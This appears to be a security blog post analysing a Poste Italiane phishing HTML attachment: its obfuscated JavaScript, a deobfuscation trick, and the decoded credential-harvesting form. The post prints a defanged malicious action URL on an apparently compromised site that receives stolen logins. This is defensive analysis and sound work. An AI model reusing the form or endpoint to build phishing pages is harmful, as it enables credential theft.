Poste italiane Phish

Day by day the victims of Phishing attacks increases in the world of Information Security. Phishing attackers target on the victims generally through spam emails which may contain message that could manipulate the victim to click to the phishing link.

Phishing attacks are commonly used to steal the user’s sensitive information such as bank credentials, credit card information and sometime even to download malware payloads.

Now we have a typical case, where the phish document was attached as an attachment to the spam email as an obfuscated attachment.

This is a phish document of “Poste italiane” (Italian Postal Service Company), where a spam email was sent to the victim with an attachment of Obfuscated Java Script.

phish_layout

“verifica_entro_24_ore_la_tua_identita.html”

Virus Total URL

The email message is in a way, which tricks the victim to open the HTML attachment with obfuscated JS code.

While viewing the source of HTML file, there is Java Script code which declares an Array of values and then the decrypting function.

js_code1

js_code2

To decode the Obfuscated Java Script code, change the “document.write(em)” with “eval(em)”. This will decode the actual HTML code.

deobfus1

The decoded HTML will again display the same Phish HTML layout.

When, analyzing a phish document the most important thing is to identify the action URL. This is the URL to which the information collected is sent.

This URL will be usually available under the code of button like “Accedi” button given this Phish Layout. This button on clicking will validate the information given and send it to the attacker.

In this case, while searching I could not find any visible action URL as the HTML document is coded in such a way, that the analyst cannot identify action URL easily.

Then I found another suspicious which contained a HTML escape character encoding.

Again after decoding it, I got the action URL.

<form id=”datiForm” name=”datiForm” method=”post” action=”hxxp://www.delletredonzelle.it/contatti/jquery.ui.widget.config.php”  onsubmit=”return  form_submit(this);”>

actionurl_decode

Advertisements

2 thoughts on “Poste italiane Phish

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s